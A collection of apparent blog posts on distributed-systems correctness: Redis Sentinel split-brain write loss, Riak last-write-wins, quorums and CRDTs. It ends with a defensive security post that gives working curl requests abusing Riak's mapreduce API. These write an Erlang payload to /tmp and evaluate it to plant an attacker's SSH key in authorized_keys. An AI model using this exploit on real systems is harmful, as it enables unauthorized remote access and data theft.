19 May 00:37:49.145 * +slave-reconf-done slave 10.10.3.101:6379 10.10.3.101 6379 @ mymaster 10.10.3.242 6379
19 May 00:37:49.145 * +slave-reconf-done slave 10.10.3.95:6379 10.10.3.95 6379 @ mymaster 10.10.3.242 6379
19 May 00:37:49.243 # +failover-end master mymaster 10.10.3.242 6379

Now n5 is a new primary–but n1 is still a primary too! Run salticid redis.replication to see the replication status of all nodes. We have two primary nodes, one in each component of the system. During this time both primaries are accepting writes independently. This is a classic split-brain scenario–and it violates the C in CP. Writes (and reads) in this state are not linearizable, because clients will see different results based on which node they’re talking to.


Healing the partition

What happens when the network comes back online? salticid jepsen.heal repairs the partition, and the Sentinel nodes will discover each other again.

Redis Sentinel used to leave both primaries running indefinitely, which meant that any scenario like a partition or crash leading to failover would result in permanent split-brain. That’s fixed in version 2.6.13, which came out last week. Now, Sentinel demotes the old primary on n1 when it comes back into contact with the majority component. The client sees:

1687 :ok
1686 READONLY You can't write against a read only slave.
1690 READONLY You can't write against a read only slave.
1693 :ok

… since n1 stepped down just after a Sentinel told us it was a primary. Clients are a part of the distributed system too. If a system’s correctness depends on clients choosing specific nodes at specific times, the clients are now engaged in a distributed consensus problem–not to mention a clock synchronization problem. This is damn hard to do correctly.

Results

1991 :ok
1995 :ok
1996 :ok
Hit enter when ready to collect results.
Writes completed in 42.002 seconds

2000 total
1998 acknowledged
872 survivors
1126 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
50 51 52 53 54 55 ...
1671 1675 1676 1680 1681 1685
0.999 ack rate
0.5635636 loss rate
0.0 unacknowledged but successful rate

Out of 2000 writes, Redis claimed that 1998 of them completed successfully. However, only 872 of those integers were present in the final set. Redis threw away 56% of the writes it told us succeeded.
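For reference, the arithmetic behind those final numbers is just set difference over the history. Here's a small sketch, with placeholder inputs shaped to reproduce the rates above (the real sets come from the test's log and the final read of the Redis set).

def tally(attempted, acknowledged, survivors):
    lost = acknowledged - survivors          # acked, but missing at the end
    unacked_ok = survivors - acknowledged    # present, but never acked
    return {"ack rate": len(acknowledged) / float(len(attempted)),
            "loss rate": len(lost) / float(len(acknowledged)),
            "unacknowledged but successful rate": len(unacked_ok) / float(len(attempted))}

# 2000 attempts, 1998 acknowledged, 872 survivors (all of them acknowledged).
print(tally(set(range(2000)), set(range(1998)), set(range(872))))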


There are two problems at work here. First, notice that all the clients lost writes at the beginning of the partition: (50, 51, 52, 53, …). That’s because they were all writing to n1 when the network dropped–and since n1 was demoted later, any writes made during that window were destroyed.

The second problem was caused by split-brain: both n1 and n5 were primaries up until the partition healed. Depending on which node they were talking to, some clients had their writes survive, and others had their writes lost. The last few lost writes, mod 5, are all 0 and 1: they came from the clients which kept using n1 as a primary, in the minority component.

Note that both of these failure modes violate the durability guarantees we claimed earlier for Redis, because there are gaps in the write log.

Redis strategies

So you’re running a distributed Redis install, and have realized that the design of Redis Sentinel (or, for that matter, any other failover system on top of an asynchronously replicated primary-secondary design) means you can lose a lot of data when a partition occurs. What can you do?

From an operations perspective, I recommend you try to understand the Sentinel consensus algorithm. I don’t, and I’ve read it a dozen times.

I tried to write a formal verification of the algorithm in TLA+, and failed. There are dozens of interacting rules which can lead to phenomenally complex edge cases. The whole thing relies on clocks–and a special mode, TILT, which tries to detect sudden clock skew. You can specify a quorum which is smaller than the number of sentinels, allowing multiple quorums to operate simultaneously. Since the system auto-discovers peers, you’ve got to make sure nobody lets a new sentinel talk to your cluster, or you might find yourself with a quorum smaller than N/2. Client, sentinel, and Redis server topologies are all different things, which (I think) means…

  • Sentinels could promote a node no clients can see
  • Sentinels could demote the only node clients can actually reach
  • Sentinels could assume a totally connected group of servers is unavailable
  • Sentinels could promote an isolated node in a minority component, then destroy data on the majority by demoting their primary later

I (tentatively) recommend running exactly one sentinel on each server node, to force server and sentinel network topologies to align. Unless the partition doesn’t happen in the network, but somewhere upwards of layer 3. Let’s not talk about that possibility.

As an application developer working with Redis, one option is simply to estimate and accept your data loss. Not all applications have to be consistent. Microsoft estimates their WAN links have about 99.5% availability, and their datacenter networks are about 10x more reliable, going down for about 4 hours per year. Not all network failures result in this kind of partition. If you’re running good network hardware in redundant configurations in real datacenters (e.g. not EC2), you cut your probability of partition down pretty far. Plenty of important applications can tolerate data loss for a few hours a year.

If you can’t tolerate data loss, Redis Sentinel (and by extension Redis Cluster) is not safe for use as:

  • A lock service
  • A queue
  • A database

If you use Redis as a lock service, this type of partition means you can take out the same lock twice–or up to N times for N nodes! Or maybe multiple times concurrently, against the same node, if you want to get weird about it. Write loss means locks can be resurrected from the dead, or vanish even when supposedly held. Bottom line: distributed lock services must be CP. Use a CP consensus system, like Zookeeper.

If you use Redis as a queue, it can drop enqueued items. However, it can also re-enqueue items which were removed. An item might be delivered zero, one, two, or more times. Most distributed queue services can provide reliable at-most-once or at-least-once delivery. CP queue systems can provide reliable exactly-once delivery with higher latency costs. Use them if message delivery is important.

If you use Redis as a database, be prepared for clients to disagree about the state of the system. Batch operations will still be atomic (I think), but you’ll have no inter-write linearizability, which almost all applications implicitly rely on. If you successfully write A, then B, you expect that any client which can see B can also see A. This is not the case. Be prepared for massive write loss during a partition, depending on client, server, and sentinel topology.

Because Redis does not have a consensus protocol for writes, it can’t be CP. Because it relies on quorums to promote secondaries, it can’t be AP. What it can be is fast, and that’s an excellent property for a weakly consistent best-effort service, like a cache. Redis Sentinel can do a great job of keeping your caches warm even in the face of network and node failure, and helping clients to gradually discover the correct nodes to interact with. Use Redis Sentinel for caching, sampling, statistics, and messaging where getting the wrong answer doesn’t hurt much. Occasional windows of 50% write loss may be just fine for your user feeds, hit counters, or upvotes.

In the next post, we’ll learn about a database with a related replication architecture: MongoDB.


Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.
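A last-write-wins resolver is only a couple of lines; here's a sketch, assuming each replica's copy carries a wall-clock timestamp (the names and values are illustrative):

# A minimal last-write-wins merge over (timestamp, value) pairs: whichever
# copy carries the higher timestamp wins, and everything the other copy
# knew is discarded.
def lww(a, b):
    return a if a[0] >= b[0] else b

# Two concurrent follower-list updates: only one survives the merge.
left  = (1000.001, {"alice", "bob"})
right = (1000.002, {"alice", "carol"})
print(lww(left, right))   # bob's follow is silently lost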

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem correctly. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock, I write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.
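Sketched out, that locked read-modify-write cycle looks something like this; lock_service and riak_bucket are hypothetical client objects, not any particular library's API.

from contextlib import contextmanager

@contextmanager
def holding(lock_service, resource):
    lock_service.acquire(resource)       # hypothetical lock API
    try:
        yield
    finally:
        lock_service.release(resource)

def add_follower(lock_service, riak_bucket, user, follower):
    key = "followers-of/" + user
    with holding(lock_service, key):
        obj = riak_bucket.get(key)            # read the current follower set
        obj.data = sorted(set(obj.data) | {follower})
        obj.store()                           # write back while holding the lock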

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.
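For concreteness, here's the quorum arithmetic in play; these are just the integer formulas from the text, not a Riak client API.

def quorum(n):
    # Riak's "quorum" value: a majority of the n_val replicas.
    return n // 2 + 1

n = 3                 # replicas per key (n_val)
w = dw = quorum(n)    # write acks and durable-write acks we wait for
r = quorum(n)         # replicas consulted on read
assert r + w > n      # any read quorum overlaps any write quorum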

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to consider writes to those fallback copies of vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, one of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, and number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(a, LWW(a, b)) = LWW(a, b). It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.
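You can check those laws mechanically. Here's a quick sketch in Python, where burn stands in for f(a, b) = 0; both functions pass, which is exactly the point: these properties buy convergence, not preservation.

def lww(a, b):                 # (timestamp, value) pairs
    return a if a[0] >= b[0] else b

def burn(a, b):                # f(a, b) = 0, more or less
    return (0, None)

for f in (lww, burn):
    a, b, c = (1, "a"), (2, "b"), (3, "c")
    assert f(a, f(b, c)) == f(f(a, b), c)     # associative
    assert f(a, b) == f(b, a)                 # commutative
    assert f(f(a, b), b) == f(a, b)           # merging b in again changes nothing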

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.

Or you could use OR-sets. It’s 130 lines of ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.
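For a sense of scale, here's a toy OR-set in a few dozen lines of Python (not Eric Moritz' CRDT or knockbox, and not production-ready): each add gets a unique tag, a remove only masks the tags the remover had observed, and merge is a union, so a concurrent add always survives.

import uuid

class ORSet:
    def __init__(self):
        self.adds = {}        # element -> set of add tags
        self.removes = {}     # element -> set of removed tags

    def add(self, e):
        self.adds.setdefault(e, set()).add(uuid.uuid4().hex)

    def remove(self, e):
        # Only mask the adds this replica has actually seen.
        self.removes.setdefault(e, set()).update(self.adds.get(e, set()))

    def contains(self, e):
        return bool(self.adds.get(e, set()) - self.removes.get(e, set()))

    def merge(self, other):
        for e, tags in other.adds.items():
            self.adds.setdefault(e, set()).update(tags)
        for e, tags in other.removes.items():
            self.removes.setdefault(e, set()).update(tags)
        return self

a, b = ORSet(), ORSet()
a.add("alice"); b.add("bob")      # concurrent follows on both sides of a partition
a.merge(b)
assert a.contains("alice") and a.contains("bob")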

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \
  http://localhost:8098/riak/everything_you_can_run/i_can_run_better \
  --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [["everything_you_can_run", "i_can_run_better"]],
 "query": [
  {"map": {
    "language": "javascript",
    "source": "function(v) { /* \"/tmp/evil.erl\" as character codes */ return [47,116,109,112,47,101,118,105,108,46,101,114,108]; }"
  }},
  {"reduce": {
    "language": "erlang",
    "module": "file",
    "function": "write_file",
    "arg": "SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\nSSH = SSHDir ++ \"authorized_keys\".\nfilelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\nfile:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\nfile:change_mode(SSHDir, 8#700).\nfile:change_mode(SSH, 8#600).\nfile:delete(\"/tmp/evil.erl\")."
  }}
 ]}
EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.
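You can check the decoding for yourself; in Python:

# The map phase's integers are just ASCII codes for the reduce phase's filename.
assert bytes([47,116,109,112,47,101,118,105,108,46,101,114,108]).decode() == "/tmp/evil.erl"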

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [["everything_you_can_run", "i_can_run_better"]],
 "query": [
  {"map": {
    "language": "javascript",
    "source": "function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; }"
  }},
  {"reduce": {
    "language": "erlang",
    "module": "file",
    "function": "path_eval",
    "arg": "/tmp/evil.erl"
  }}
 ]}
EOF

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

Copyright © 2015 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.